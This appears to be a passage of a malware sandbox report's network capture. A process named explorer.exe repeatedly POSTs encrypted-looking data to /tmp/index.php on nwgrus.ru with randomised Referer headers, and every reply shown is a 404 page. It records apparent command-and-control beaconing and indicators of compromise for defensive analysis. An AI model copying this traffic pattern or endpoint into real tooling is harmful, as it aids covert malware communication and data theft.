                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.650011125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:21.158194065 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://fplvqqohjqdma.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 287
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:21.158229113 CEST287OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 31 3b ee f1
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu1;fYZnq6OVB~*m5g[SE(,RElA&2fP{zP4QU;tE}}{*g-eo%Y~
                                                                    Oct 14, 2024 06:03:22.762264013 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:22 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.650012125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:22.773956060 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://rdjriakbylriblg.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 154
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:22.773974895 CEST154OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 39 41 f9 85
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu9A}LrF_.Hd2uKVBm5B1)-{d2
                                                                    Oct 14, 2024 06:03:24.251450062 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:23 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.650013125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:24.270028114 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://sgyfmqyxpkmdbygm.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 321
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:24.270092964 CEST321OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 23 06 c5 84
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu#MP}S8S\"8es$x}R&M]#LjEW$t)u.g|S,BYTRWQ!{hev+(;@i/TL
                                                                    Oct 14, 2024 06:03:25.849334002 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:25 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.650014125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:25.858557940 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://eyrnjiqpamojnvp.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 219
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:25.858557940 CEST219OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 37 20 ca 91
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu7 E*UJT!KL<.q=x4tJY d>mMTY~,MF^IM;HF1aB
                                                                    Oct 14, 2024 06:03:27.421068907 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:27 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.650015125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:27.430206060 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://rlfugmueckmpbf.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 131
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:27.430206060 CEST131OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 45 4a fd ea
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuEJkw~k#\?ebo=j:A
                                                                    Oct 14, 2024 06:03:29.192805052 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:28 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.650016125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:29.203883886 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://hykquqealhec.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 182
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:29.204062939 CEST182OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 75 27 d2 f2
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuu'kvFMDEs=`I[ah3Wq[\$JZkw5)<c1LDa
                                                                    Oct 14, 2024 06:03:30.817409039 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:30 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.650017125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:30.826036930 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://wcfowkxogmtykxos.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 298
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:30.826054096 CEST298OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 37 1b d2 ea
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu7f\Y&'6A`4ee9|m-.,$L1[VMP=?]NI3CCL mM,Z7IthDs.Ba.?0:
                                                                    Oct 14, 2024 06:03:32.304296970 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:31 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.650018125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:32.312530994 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://mxgxdupfkhdkpgcd.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 223
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:32.312586069 CEST223OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 6c 27 e4 fb
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[*k,vul'tGEYzh"vlP!efN%KST"SJODK317[)i8,GHA;49
                                                                    Oct 14, 2024 06:03:34.246735096 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:33 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
